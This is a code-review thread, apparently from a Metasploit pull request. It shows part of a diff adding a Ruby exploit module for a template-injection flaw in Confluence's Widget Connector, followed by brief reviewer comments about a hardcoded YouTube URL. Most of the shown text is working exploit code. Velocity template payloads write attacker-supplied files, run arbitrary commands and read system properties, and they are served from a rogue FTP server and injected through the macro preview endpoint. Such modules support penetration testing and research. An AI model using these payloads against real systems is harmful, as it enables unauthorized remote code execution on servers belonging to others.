modules/exploits/multi/http/confluence_widget_connector.rb

```diff
@@ -0,0 +1,494 @@
+  # @param arg [String] EPSV argument.
+  # @return [void]
+  def on_client_command_epsv(c,arg)
+    vprint_status("#{@state[c][:name]} UNKNOWN 'EPSV #{arg}'")
+    c.put("500 'EPSV #{arg}': command not understood.\r\n")
+  end
+
+  # Returns a upload template.
+  #
+  # @return [String]
+  def get_upload_vm()
+    (
+      <<~EOF
+        $i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{@fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{@b64}'))
+      EOF
+    )
+  end  
+
+  # Returns a command execution template.
+  #
+  # @return [String]
+  def get_exec_vm()
+    (
+      <<~EOF
+        $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{@command}').waitFor()
+      EOF
+    )
+  end 
+
+  # Returns checking template.
+  #
+  # @return [String]
+  def get_check_vm()
+    (
+      <<~EOF
+        #{@check_text}
+      EOF
+    )
+  end
+
+  # Returns Java's getting property template.
+  #
+  # @return [String]
+  def get_javaprop_vm()
+    (
+      <<~EOF
+        $i18n.getClass().forName('java.lang.System').getMethod('getProperty', $i18n.getClass().forName('java.lang.String')).invoke(null, '#{@prop}').toString()
+      EOF
+    )
+  end
+
+  # Returns dummy template.
+  #
+  # @return [String]
+  def get_dummy_vm()
+    (
+      <<~EOF
+      EOF
+    )
+  end  
+
+  # Checks the vulnerability. 
+  #
+  # @return [Array] Check code
+  def check
+    checkcode = Exploit::CheckCode::Safe
+    begin
+      # Start the FTP service
+      print_status("Starting the FTP server.")
+      start_service
+
+      @check_text = 'PwN3d'
+      res = inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}check.vm")
+      if res && res.body && res.body.include?('PwN3d')
+        checkcode = Exploit::CheckCode::Vulnerable
+      end
+    rescue Msf::Exploit::Failed => e
+      vprint_error(e.message)
+      checkcode = Exploit::CheckCode::Unknown
+    end
+    checkcode
+  end
+
+  # Injects Java code to the template.
+  #
+  # @param service_url [String] Address of template to injection.
+  # @return [void]
+  def inject_template(service_url)
+
+    uri  = normalize_uri(target_uri.path, 'rest', 'tinymce', '1', 'macro', 'preview')
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => uri,
+      'headers' => {
+        'Accept' => '*/*',
+        'Origin' => full_uri(vhost_uri: true)    
+      },
+      'ctype'  => 'application/json; charset=UTF-8',
+      'data'   => { 
+                    'contentId' => '1',
+                    'macro' => {
+                      'name' => 'widget',
+                      'body' => '',
+                      'params' => {
+                        'url' => 'https://www.youtube.com/watch?v=dQw4w9WgXcQ',
```

Comment:
I wouldn't hardcode this YouTube URL... but I like it.

Reply:
This necessary to trigger vulnerable handler.

Reply:
Gotcha. I only skimmed the writeups so far, so I'm assuming this needs to be a reachable URL. Carry on. ;)

Reply:
I would make this a configurable option in that case. Being able to supply a non-hardcoded URL would be helpful if it isn't being randomized.

Reply:
Done. It's a configurable option now.